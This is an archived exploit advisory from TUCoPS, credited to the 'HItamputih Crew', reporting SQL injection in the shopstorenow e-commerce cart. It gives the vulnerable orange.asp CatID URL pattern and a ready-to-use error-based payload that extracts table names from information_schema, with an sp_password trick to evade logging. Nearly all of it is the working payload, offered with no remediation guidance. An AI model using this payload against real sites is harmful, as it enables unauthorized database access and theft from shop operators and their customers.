TUCoPS :: HP Unsorted S :: c07-1697.htm

shopstorenow (orange.asp) sql injection
shopstorenow (orange.asp) sql injection
shopstorenow (orange.asp) sql injection


============================= HItamputih Crew ===================#hitamputih Advisory
##Discovered By : IbnuSina
#-----------------------------------------------------------
#Software: shopstorenow E-commerce Shopping Cart
#Method: SQL Injection
#
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//orange.asp?CatID=[SQL] 
===============================================ex:

http://[target]/[path]//orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password 

#########################################################################################

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH